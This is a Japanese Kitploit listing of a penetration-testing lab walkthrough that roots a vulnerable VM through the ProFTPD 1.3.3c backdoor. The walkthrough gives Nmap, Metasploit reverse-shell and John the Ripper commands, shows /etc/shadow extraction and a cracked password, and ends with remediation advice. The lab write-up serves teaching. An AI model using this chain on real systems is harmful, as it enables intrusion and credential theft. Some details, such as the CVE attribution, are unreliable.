Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Offensive-lab-2 — 脆弱なUbuntu VM上でのペネトレーションテストのウォークスルー。ProFTPD 1.3.3cバックドア(CVE-2010-4221)を悪用してrootアクセスを取得し、フラグを獲得。Nmapによる列挙、Metasploitによるペイロード設定、ユーザーハッシュクラッキング(John the Ripper)を含む。 | Kitploit
ツール/GitHubGitHub/mafiosohack/offensive-lab-2
パスワードクラッキング偵察エクスプロイトフレームワークポートスキャン脆弱性分析エクスプロイトポストエクスプロイトCTFペネトレーションテスト学習と教育ラボと実践
GitHub
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
mafiosohack/offensive-lab-2

Offensive-lab-2

脆弱なUbuntu VM上でのペネトレーションテストのウォークスルー。ProFTPD 1.3.3cバックドア(CVE-2010-4221)を悪用してrootアクセスを取得し、フラグを獲得。Nmapによる列挙、Metasploitによるペイロード設定、ユーザーハッシュクラッキング(John the Ripper)を含む。

リポジトリを見る

攻撃的セキュリティラボ : ProFTPD 1.3.3c バックドアエクスプロイト (Root フラグ)

  1. はじめにと目的

本レポートは、脆弱な Linux 仮想マシン (VM) に対して実施したペネトレーションテストの詳細を記述し、即座に root アクセスを可能にした高リスクのサービス脆弱性の特定に焦点を当てています。

詳細値
ターゲットIPアドレス[ 192.168.222.130]
攻撃元IPアドレス (LHOST)[ 192.168.222.128]
ターゲットOSUbuntu 4ubuntu2.2 (Linux Kernel 3.x)
目的Root レベルのシェルを取得し、フラグファイルを取得する。
  1. 初期列挙と脆弱性の特定

初期偵察では、Nmap を使用したサービススキャンにより、オープンポートとサービスバージョンを特定しました。

コマンド:

root@kitploit:~
sudo nmap -sS -sV 192.168.222.130
主な発見:
 | ポート | サービス | バージョン | リスク | | :--- | :--- | :--- | :---
 | 21/tcp | ftp | ProFTPD 1.3.3c | 重大 (エクスプロイト可能なバックドア) |
 | 22/tcp | ssh | OpenSSH 7.2p2 | 低 (標準サービス) |
 | 80/tcp | http | Apache httpd 2.4.18 | 低 (明らかな Web 脆弱性は見つからず) |

続いて実行した脆弱性スクリプトスキャンにより、FTP サービス内に極めて重大なバックドアが存在することが確認されました。
Nmap スクリプトの出力は、root ユーザーとしてのコマンド実行を明示的に示しました。

| ftp-proftpd-backdoor: 
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root)...

3. エクスプロイトと Root シェルの取得

Metasploit Framework を使用して、確認された ProFTPD バックドアを悪用しました。

エクスプロイト手順:
- Metasploit の起動: msfconsole
- エクスプロイトモジュールの選択: use exploit/unix/ftp/proftpd_133c_backdoor
- オプションの設定:

```bash

set RHOSTS 192.168.222.130
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.222.128

結果: コマンドシェルセッションが正常に確立され、即座に root 権限 (uid=0) が付与されました。

  1. ポストエクスプロイトとフラグの取得

認証情報の収集

システムのユーザーハッシュは、ポストエクスプロイト分析のために /etc/shadow から抽出されました。ユーザー marlinspike のハッシュは、John the Ripper を使用して正常にクラックされました。

使用したコマンド (攻撃元マシン):

root@kitploit:~

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

クラックされた認証情報:

User: marlinspike Password: marlinspike

  1. 修復の推奨事項

システムのセキュリティ態勢は、侵害された FTP サービスにより非常に脆弱です。システムを保護するために、直ちに以下の措置を講じる必要があります。

  • 即時パッチ/アップグレード: 既知のバックドアと関連する CVE を修正するために、ProFTPD サービスを直ちにパッチ適用またはセキュアなバージョン (1.3.3g より新しいバージョン) にアップグレードする必要があります。
  • サービスの削除: FTP がシステムの機能に必要でない場合は、サービスを完全に削除する必要があります。
  • ファイアウォール: ポート 21 への外部アクセスをブロックするために、厳格なファイアウォールルール (iptables/ufw) を実装します。
  • セキュアなシェル設定: root ログインを無効にし、鍵ベースの認証を強制するために、SSH 設定を確認します。 実行: exploit
ツールをダウンロード